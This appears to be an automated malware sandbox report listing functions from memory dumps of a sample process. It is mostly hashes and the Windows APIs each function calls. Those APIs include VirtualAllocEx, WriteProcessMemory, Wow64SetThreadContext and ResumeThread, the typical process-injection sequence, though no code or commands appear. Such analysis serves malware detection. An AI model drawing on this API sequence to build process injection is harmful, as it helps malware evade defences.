                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-1437089595
                                                • Opcode ID: 19653b2bef41d327c468d7b1bf57d9da4ea0963dbb61f7a038c67e4a7c016833
                                                • Instruction ID: 8e84084d9baea2e0e3f968c2a55b4a4005bef8417099d8829c716ee5c2cc795e
                                                • Opcode Fuzzy Hash: 19653b2bef41d327c468d7b1bf57d9da4ea0963dbb61f7a038c67e4a7c016833
                                                • Instruction Fuzzy Hash: ECB1B431E44219DFDB58CF98C654AADB7B2FF84720F25841AD402AF395CB309D56CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2818371802
                                                • Opcode ID: 0a5b10bd24758a6157dd58b8265a8522f10378e886c55f59a26c0c74ea7fcc7e
                                                • Instruction ID: 9b4185f09faec0736721ed11899d962a7e569a31e7f571e58208e013e0b2a51e
                                                • Opcode Fuzzy Hash: 0a5b10bd24758a6157dd58b8265a8522f10378e886c55f59a26c0c74ea7fcc7e
                                                • Instruction Fuzzy Hash: C6F17134F44209DFEB589F68D658BAE76E2BF84710F108429E502AB394DF76CC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                                                • API String ID: 0-3830373724
                                                • Opcode ID: 9bd8e10f4f2cd570cc26c8b28ce04b5d8b637ec8f140f3cf16cb35d1c7f8ea1e
                                                • Instruction ID: eb0672c48c849a901dadce732bcf3e378f7931dfb248c97f914612b537e94f41
                                                • Opcode Fuzzy Hash: 9bd8e10f4f2cd570cc26c8b28ce04b5d8b637ec8f140f3cf16cb35d1c7f8ea1e
                                                • Instruction Fuzzy Hash: F0E17234F44209DFEB589F68DA54BAD76E2BB84721F108429E502AB394DF768C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                • API String ID: 0-1901060420
                                                • Opcode ID: 44c563f601b9e9adeb30363ce625625394b4a9e5fee0df9d44d242eccc9fb736
                                                • Instruction ID: 566c8b999d310fd540a752259024156caa9d9778c5d72f9978c42945506569fc
                                                • Opcode Fuzzy Hash: 44c563f601b9e9adeb30363ce625625394b4a9e5fee0df9d44d242eccc9fb736
                                                • Instruction Fuzzy Hash: 7F41B674D0420ACFCB08DFA8C6A45AEBBB2FF45340F15C969D0125B366D731C959CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq$8bq$8bq
                                                • API String ID: 0-2509483264
                                                • Opcode ID: 8dfce7964f20ccb965312b29c042d826c110b877f73d029d720364bfad95c5a5
                                                • Instruction ID: ba69ab93910829a084c0ae8d738255098d86891e8d4bd6979a94fb68d4d1cf66
                                                • Opcode Fuzzy Hash: 8dfce7964f20ccb965312b29c042d826c110b877f73d029d720364bfad95c5a5
                                                • Instruction Fuzzy Hash: C7212C31A08216CFE754CB69DA502BA7BA5FB41339F04423FE0B5C71D1CA3AC946C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: e7486afea2c404182db0507cbbc3977de4868574f02c401525a33ddf5eae88ba
                                                • Instruction ID: 5dbd34ba70da477a434f5b0d342a1d6f2211247efb3f43c5eecca9ed3e3388f2
                                                • Opcode Fuzzy Hash: e7486afea2c404182db0507cbbc3977de4868574f02c401525a33ddf5eae88ba
                                                • Instruction Fuzzy Hash: 18816434F44209DFEB589F68D658BAD77A3BF84721F108429E502AB394DF768C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: 6b5e14195857ca42485928431610884bc4b1a72af0dddc85f34e5a535775ac68
                                                • Instruction ID: a313b794b6c56deb8f857b6d198dddb9595d7e0c7b6a426ae39c90eeaecb87a5
                                                • Opcode Fuzzy Hash: 6b5e14195857ca42485928431610884bc4b1a72af0dddc85f34e5a535775ac68
                                                • Instruction Fuzzy Hash: 62616234F44209DFEB589F74DA58BAD76A3BB84721F108429E502AB3D4DE728D42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5$3H5
                                                • API String ID: 0-2752242361
                                                • Opcode ID: 76e2c6a2afdffdaf4dc1b8c5d0b358026f3013832777faeda8624467f401edb2
                                                • Instruction ID: 2f4ddd2771c21d02186f9acb4ed83261d1fc36eb233367c014093269d42e364f
                                                • Opcode Fuzzy Hash: 76e2c6a2afdffdaf4dc1b8c5d0b358026f3013832777faeda8624467f401edb2
                                                • Instruction Fuzzy Hash: 32313CB4D1920ADFDB84CFA9C9405AEFBF2BF89210F14C5AAC544EB215E7309A45CB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C27D2E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f5c8621f1d5d5b844d3d6e5c3bc03fa5605438f36f09c46f3bf7747ac01a1e4c
                                                • Instruction ID: 2825293d32eae440519c9af1aaf30dd182888606bc3d6de75549c66cef7a684e
                                                • Opcode Fuzzy Hash: f5c8621f1d5d5b844d3d6e5c3bc03fa5605438f36f09c46f3bf7747ac01a1e4c
                                                • Instruction Fuzzy Hash: 08A18171D01229DFDF10DF68C981BEDBBB2BF44314F1485AAD848A7250DBB4AA85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C27D2E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 5b96d43616cbfceeeffa32f8bac5e213a49bf76a5f3200fa2e17c6d9c7a05134
                                                • Instruction ID: cf9e5cc09ec3f5822c0bf5f98f5f70a8040adf91289600e02467d4d0112f1645
                                                • Opcode Fuzzy Hash: 5b96d43616cbfceeeffa32f8bac5e213a49bf76a5f3200fa2e17c6d9c7a05134
                                                • Instruction Fuzzy Hash: EB917271D01229DFDF10DF68C981BEDBBB2BF44314F1485AAD808A7250DBB4AA85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF56
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 8a6431a9156d0360c469b871b50bd73c81f1d1edbaf268d7a61b200916502138
                                                • Instruction ID: cd9297c6fbcf7e9add676717db661a8489ba08ae0defa008e1641db3f8fd5f58
                                                • Opcode Fuzzy Hash: 8a6431a9156d0360c469b871b50bd73c81f1d1edbaf268d7a61b200916502138
                                                • Instruction Fuzzy Hash: D47154B0A10B068FDB24DF2AC14079ABBF5FF88304F40892DD18ADBA50D775E845CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 012A59A9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 2b83c5b9574aaef7063dafca7b34b2c283addc23daf867383e63ff6c1aafae84
                                                • Instruction ID: 6f920fbbc84f770368652354434c40a12696d927c2dd045e12553e0fb78ce485
                                                • Opcode Fuzzy Hash: 2b83c5b9574aaef7063dafca7b34b2c283addc23daf867383e63ff6c1aafae84
                                                • Instruction Fuzzy Hash: 2F41F2B0D10719CFDB24CFA9D884B8EBBB5BF48304F60806AD408AB251DB756985CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 012A59A9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: d5858dfc08dc530b3f40533435ae4a94cb650f0229e05edcd691021d2e69afc1
                                                • Instruction ID: a1c611a2bd0fdb10716b756888eaec08850fda7fba9100a8e5046b697926b1e2
                                                • Opcode Fuzzy Hash: d5858dfc08dc530b3f40533435ae4a94cb650f0229e05edcd691021d2e69afc1
                                                • Instruction Fuzzy Hash: 4441DFB0D10719CFDB24CFA9C884B8EBBF5BF49304F64806AD408AB255DB756945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD2A6,?,?,?,?,?), ref: 012AD367
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 8be1de6119436a10eea4cc7fa2a3838f00d9c68fa2c39b7ed6e1f60f239d0f38
                                                • Instruction ID: cc460150707dce32542ea8687a1b5f0f2dec5b29dbabff8aae99d2d3e852b7ab
                                                • Opcode Fuzzy Hash: 8be1de6119436a10eea4cc7fa2a3838f00d9c68fa2c39b7ed6e1f60f239d0f38
                                                • Instruction Fuzzy Hash: B7316B78A41344AFF7249FA0FA997693FA6F788314F21852AE9018B7C8DB754941CF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D2E37D,?,?), ref: 06D2E42F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1735869389.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6d20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: 23c8bbbbbdae8c5b8677d27588c0e37e2d44a7b230b14899daa81ecb91284067
                                                • Instruction ID: 920100d473e5cdbf17be2fe9789e10dc073a2ab28acfc8666041e90bd37d9055
                                                • Opcode Fuzzy Hash: 23c8bbbbbdae8c5b8677d27588c0e37e2d44a7b230b14899daa81ecb91284067
                                                • Instruction Fuzzy Hash: 9731F1B5D012199FCB10CF9AD884ADEFBF4BB48314F14842AE818A7210D374A945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D2E37D,?,?), ref: 06D2E42F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1735869389.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6d20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C27900
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C27900
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C279E0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04C27756
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD2A6,?,?,?,?,?), ref: 012AD367
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C279E0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04C27756
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD2A6,?,?,?,?,?), ref: 012AD367
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AB3D1,00000800,00000000,00000000), ref: 012AB5C2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C2781E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C2781E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AB3D1,00000800,00000000,00000000), ref: 012AB5C2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 04C2B0BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF56
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 04C2B0BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                • Opcode ID: 87fb8e5a4e91498d7b1726adf4419951e4ffd21cdf02d3371099982e8ad55b8c
                                                • Instruction ID: 98adb2ae2b53258cd1c5b25298a4be0d0344e100aff8eda3d9b74b5c2210e992
                                                • Opcode Fuzzy Hash: 87fb8e5a4e91498d7b1726adf4419951e4ffd21cdf02d3371099982e8ad55b8c
                                                • Instruction Fuzzy Hash: B7112E71F0021A8FCB94EBB99A505EEB7F6AF84320B50456EC505E7244EF319E16CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1f4b8b2306823c38ffa866df84c66398b433be016d9d3c051eda694fd4a0f0f
                                                • Instruction ID: 3d421d0ad8f0f71abefbab0c62dcf5a4f3ed51fe7b1eeb20bd991184d0285d8a
                                                • Opcode Fuzzy Hash: d1f4b8b2306823c38ffa866df84c66398b433be016d9d3c051eda694fd4a0f0f
                                                • Instruction Fuzzy Hash: EB519073E04117CFDB90CB69CA406BEB7B2BB452A1F04C52EE5669B281D739D940CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06e80f2d72c22ce2e26b4484f3586ffd1340e559e3c1bbc518efc555614dbb92
                                                • Instruction ID: f66a8fba487a01376c29b510622358c52f9bee2546e94a4d6f8974d0acd0f87d
                                                • Opcode Fuzzy Hash: 06e80f2d72c22ce2e26b4484f3586ffd1340e559e3c1bbc518efc555614dbb92
                                                • Instruction Fuzzy Hash: 004197B89097C48FC706CFA9D440948BFB0AF8A211F1A84DBC484DB3A3D6359999CB12
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1506c278a113fa70b386a468c827e45c196e0c481d5320c09537f2109f369b38
                                                • Instruction ID: 03003ef9e22a721792d7d07dba2abbc96927a642be78cb50ae713ccfb2de4e31
                                                • Opcode Fuzzy Hash: 1506c278a113fa70b386a468c827e45c196e0c481d5320c09537f2109f369b38
                                                • Instruction Fuzzy Hash: C241DF75E0424ADFCB05CFA9D8419EEBBB2FF89310F24912AD505BB350D3708A41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
